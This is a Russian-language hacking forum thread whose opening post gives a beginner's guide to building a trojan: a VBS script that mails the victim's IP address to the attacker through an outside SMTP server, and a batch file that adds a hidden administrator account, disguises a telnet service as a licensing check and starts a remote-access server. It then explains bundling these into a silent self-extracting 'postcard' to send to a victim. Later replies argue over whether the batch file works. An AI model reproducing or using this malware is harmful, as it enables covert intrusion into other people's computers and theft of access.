Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Новичкам » Взлом компа (Удаленное Управление с приятным интерфейсом)


Взлом компа (Удаленное Управление с приятным интерфейсом)

Сообщений 1 страница 16 из 16

1

Троян не палился не одним из 40 антивирусов.
Сейчас я покажу как написать трояна который будет открывать 23[telnet] и 28137[FTP] порт , будет один файл *.exe , юзер откроет его , а там откроется картинка , не каких лишних окон выходить не будет .
Для начала скачиваем прогу  Yoozy

Для создания трояна нужны файлы :
1)YoozyServer.exe - находится в архиве
2)любая картинка с названием 123.jpg
3)mail.vbs - этот файл присылает ip на мыло
4)user.bat - нужно создать ярлык этого файла

Исходник mail.vbs

Код:
Const FOF_SIMPLEPROGRESS = 256
Dim MySource, MyTarget, MyHex, MyBinary, i
Dim oShell, oCTF
Dim oFileSys
dim winShell
dim newfolderpath
dim t
On Error Resume Next
h = Hour(Now)
m = Minute(Now)
s = Second(Now)
t = date() & "-" & h & "-" & m & "-" & s
dim filesys, newfolder
newfolderpath = "c:\12345" ' Название временной папки
set filesys=CreateObject("sсriрting.FileSystemObject")
If Not filesys.FolderExists(newfolderpath) Then
Set newfolder = filesys.CreateFolder(newfolderpath)
End If
set filesys=Nothing
Set newfolder=Nothing

Set WshShell = CreateObject("Wsсriрt.Shell")
WshShell.Run "cmd.exe /c ipconfig > C:\12345\ip.txt", 0, false

Wsсriрt.Sleep (5000)

Set S = CreateObject("Wsсriрt.Shell")
set FSO=createobject("sсriрting.filesystemobject")
Call SendPost("smtp.mail.ru","куда придёт айпи","левое мыло с @mail.ru","IP ЛАМЕРА","ИПЫ")
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,s trbоdу)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="здесь логин левого мыла без @mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="здесь пароль от левого мыла"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.updаtе
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.Textbоdу=strbоdу
iMsg.AddAttachment "C:\12345\ip.txt"
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing

Исходник user.bat

Код:
@Echo off
start C:\mail.vbs
start C:\123.jpg
chcp 1251
net user SUPPORT_388945a0 /delete
net user SUPPORT_388945a0 1 /add
net localgroup "Администраторы" SUPPORT_388945a0 /add
net localgroup "Пользователи" SUPPORT_388945a0 /del
copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe"
ECHO Windows Registry Editor Version 5.00>>user.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg
ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg
regedit /s user.reg && DEL user.reg
sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP
sc desсriрtion "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение."
sc config tlntsvr start= auto
tlntadmn config port=23 sec=-NTLM
net start Telnet

start C:\YoozyServer.exe

Этот код создаст юзера с логином :SUPPORT_388945a0 и паролем :и паролем : , для подключения через 23 порт , юзер будет скрыт и не будет отображатся .

Скрины :
Все 4 файла

http://s003.radikal.ru/i202/1111/78/c78487510848.png

http://s010.radikal.ru/i311/1111/94/048567bfaafa.png

http://s53.radikal.ru/i139/1111/2f/fd0d44e0898d.png

http://s017.radikal.ru/i438/1111/14/e588c37814cd.png

Winrar
Настройки в winrar'e , нужно выделить всё и щёлкнуть правой кнопкой мыши , и выбрать "Добавить в архив", дадим название файлу Окрытка.exe

http://s017.radikal.ru/i432/1111/5e/524c7a9db51f.png

После нажимаем "Дополнительно" "Параметры SFX"

http://s005.radikal.ru/i210/1111/35/efbcb32109db.jpg

После нажимаем на вкладку "Режимы" и ставим галочку на "скрыть всё"

http://s39.radikal.ru/i086/1111/d3/a0a8a12a0b71.png

Нажимаем на вкладку "текст и графика" там есть функция "Загрузить значок SFX из файла" скачиваем с инета иконки указываем пуь , после нажимаем "ок" "ок" и у нас должен получится один файл "Открытка.exe"
Пример:
http://s013.radikal.ru/i324/1111/8e/eddf76570859.png

Далее закидываем жертве и ждём ip , после того как ip пришёл Открываем Yoozy.exe (не вздумайте открыть YoozyServer.exe) вводим ip и мы имеем полный доступ к файлам , а чтоб подключится через telnet , заходим Пуск-Выполнить- telnet.exe или зажимаем клавиши windows+r .

http://s017.radikal.ru/i423/1111/6e/4c43ab7458a9.jpg

Если помог не забываем поблагодарить https://forumupload.ru/uploads/000f/db/02/1710-2.gif

0

2

1)Ставь копирайт на копипаст.
2)Батинок с телнетом уже неактуален,актуальный батинок есть на форуме.
3)Лучше воопще всё делать по другому и батинок компилить в EXE.

0

3

Ну подельсь как?
Так как я начинающий ещё многого не знаю)

0

4

BODI не ленись прочитай Как склеивают вирусы с программами.
Как через ftp залить вирус на удаленную машину - батинок на телнет можешь взять здесь.
Да и сам батинок надо переписать воопще,справочник по командной строке юзани,что бы батинки писать.
Далее сам батинок работать не будет,в нём ошибки есть.

0

5

MOssWar
Ты наверно не понял,подключение к удаленному столу не через telnet, телнет это 2-й способ подключения

0

6

BODI yoozy уже давным давно палиться антивирусами и даёт возможность,только работать с файлами,но ни как ни с системой.
Да и какая разница какой это способ?
Факт в том что в батинке куча ошибок и он не будет работать,юзай справочник по командной строке.

0

7

Ну ты как то странно мне говоришь что он не будет работать если уже куча народу,затестила этот софт и радуется.
Помойму вчера последний отписался в моей теме что все прикрасно работает и софт не палиться.
Кстати с помощтю Yoozy можно запустить командную строку и работай себе с системой.

0

8

1)ты хочешь сказать что ты автор?
2) Каким макаром ты запускаешь через Yoozy командную строку?
3)Ты хоть бы сам для начала проверил на работоспособность,а потом бы уже....
к 1 распиши свой батинок по строчно(ты этого не в силах сделать так как сам не знаешь что делает та или иная команда,даже тупа не вкуриваешь как это должно работать)
к 2 сними видос как ты через Yoozy запускаешь командную строку и при помощи запущенной командной строки выполняешь какие либо команды.
Ни какого из этих условий ты не в силах выполнить. https://forumupload.ru/uploads/000f/db/02/1745-4.gif

0

9

1)Я не автор но код давольно лёгкий,и каждый юзер его сможет (с кривыми руками) понять какие команды он выполняет.
2)Заходим черз Yhoozy в папку где сама cmd по умолчанию C:\Windows\System32\cmd.exe и не надо мне лечить, я сам собирал эту программу,запускал на 2 машинах и подключался к cmd.
Не верешь попробуй сам.
Не можешь собрать https://forumupload.ru/uploads/000f/db/02/1721-3.gif могу выложить видео и не надо косить на кривой код!
Могу снять видео как Yoozy легко подключается к командной строке.
3)Батники я давно уже читаю и 75% понимаю какие сторики и т.д выполняют команды и функции.(что то наподобие таких тем Кликай.
Скорее всего ты мяня забанишь,что бы не продалжать тему,Но это твое право.

0

10

BODI написал(а):

2)Заходим черз Yhoozy в папку где сама cmd по умолчанию C:\Windows\System32\cmd.exe

Это было откравеное признание что ты даже основы бата не знаешь https://forumupload.ru/uploads/000f/db/02/1708-2.gif

0

11

BODI ну тык в чём трабла,распиши построчно батинок,тем более что на такой код и мозгов не надо.
И видео на то как ты через Yoozy запускаешь KMD сделай.

BODI написал(а):

что то наподобие таких тем Кликай.

откровенный тупизм,смысл этой беспантовой и грамотной билиберды?
Lyubitel

BODI написал(а):

я сам собирал эту программу,запускал на 2 машинах и подключался к cmd.

вот это было откровенное признание,не то что там знает или не знает бат,а в том что он даже и не юзал Yoozy))

0

12

Админы Атаковали!)
Вы патаетесь что то мне доказать,так как вы знаете больше чем я ссылаясь на что то другое чего я незнаю.

MOssWar написал(а):

откровенный тупизм,смысл этой беспантовой и грамотной билиберды?

Это ты начал про то что сборка гавно и собрать ее можно было подругому!

Lyubitel
Причём тут вообще основы бата?

Если бы я незнал как юзать юзи и как вообще эту сборку я бы не занимался ерундой не спорил бы тут с вами и не выкладывал бы сюда вот эту тему! https://forumupload.ru/uploads/000f/db/02/1738-2.gif 

0

13

BODI написал(а):

MOssWar написал(а):
откровенный тупизм,смысл этой беспантовой и грамотной билиберды?
Это ты начал про то что сборка гавно и собрать ее можно было подругому!

Это к вот этому 

BODI написал(а):

(что то наподобие таких тем Кликай.

BODI написал(а):

Вы патаетесь что то мне доказать,так как вы знаете больше чем я ссылаясь на что то другое чего я незнаю.

Ты сам тут тупа пытаешься въехать в ухо что ты знаешь больше чем на самом деле, приводя тупа невозможное.
На какой хрен воопще выставлять себя так?

Если бы я незнал как юзать юзи и как вообще эту сборку я бы не занимался ерундой не спорил бы тут с вами и не выкладывал бы сюда вот эту тему!

Ну так ты докажи,распиши тело батинка,сними видео о невозможном,переубеди если ты прав,нет так на хрена воопще врать да и ещё так при этом усираться?
Чё за детство?

0

14

MOssWar
Сорри за пор насчёт кода
Действительно есть (нашел) ошибки.

0

15

BODI
ты лучше расписал бы тело батинка )))) на счет что ты не прав итак всем яcно  https://forumupload.ru/uploads/000f/db/02/1708-5.gif

+1

16

Lyubitel да нах он нужен.

0


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Новичкам » Взлом компа (Удаленное Управление с приятным интерфейсом)